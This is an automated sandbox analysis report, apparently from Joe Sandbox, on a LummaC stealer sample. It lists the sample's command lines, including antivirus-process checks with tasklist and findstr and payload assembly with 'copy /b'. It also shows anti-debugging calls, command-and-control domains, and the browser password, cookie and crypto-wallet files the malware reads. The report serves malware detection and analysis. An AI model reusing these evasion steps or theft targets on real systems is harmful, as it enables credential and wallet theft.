Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Appliance.com, 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E3F4FF BlockInput,

10_2_00E3F4FF

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00DC338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00DC338B

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00DE5058 mov eax, dword ptr fs:[00000030h]

10_2_00DE5058

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E220AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

10_2_00E220AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DF2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00DF2992
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00DE0BAF
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE0D45 SetUnhandledExceptionFilter,	10_2_00DE0D45
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00DE0F91

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Appliance.com, 0000000A.00000003.1995184520.0000000004624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: debonairnukk.xyz
Source: Appliance.com, 0000000A.00000002.2110637059.00000000003D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: diffuculttan.xyz
Source: Appliance.com, 0000000A.00000002.2110637059.00000000003D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: effecterectz.xyz
Source: Appliance.com, 0000000A.00000002.2110637059.00000000003D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: deafeninggeh.biz
Source: Appliance.com, 0000000A.00000002.2110637059.00000000003D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: immureprech.biz

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

10_2_00E21B4D

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00DC338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00DC338B

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E2BBED SendInput,keybd_event,

10_2_00E2BBED

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E2ECD0 mouse_event,

10_2_00E2ECD0

Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 19152	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Bookmarks" Sv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina M	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\19152\Appliance.com Appliance.com M	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E214AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

10_2_00E214AE

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E21FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

10_2_00E21FB0

Source: Appliance.com, 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmp, Appliance.com, 0000000A.00000003.1999420955.0000000004B8F000.00000004.00000800.00020000.00000000.sdmp, Slideshow.0.dr, Appliance.com.1.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Appliance.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00DE0A08 cpuid

10_2_00DE0A08

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E1E5F4 GetLocalTime,

10_2_00E1E5F4

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E1E652 GetUserNameW,

10_2_00E1E652

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00DFBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

10_2_00DFBCD2

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: Appliance.com, 0000000A.00000002.2115264331.000000000430C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115565079.000000000464C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Appliance.com PID: 4504, type: MEMORYSTR
Source: Yara match	File source: 10.2.Appliance.com.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1994621887.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2115489202.000000000437E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1995305908.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Appliance.com, 0000000A.00000002.2115264331.00000000042F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Appliance.com, 0000000A.00000002.2115264331.00000000042F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Appliance.com, 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: Appliance.com, 0000000A.00000002.2115264331.00000000042F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Appliance.com, 0000000A.00000002.2115045633.0000000001C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Appliance.com, 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Appliance.com, 0000000A.00000002.2115264331.00000000042F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
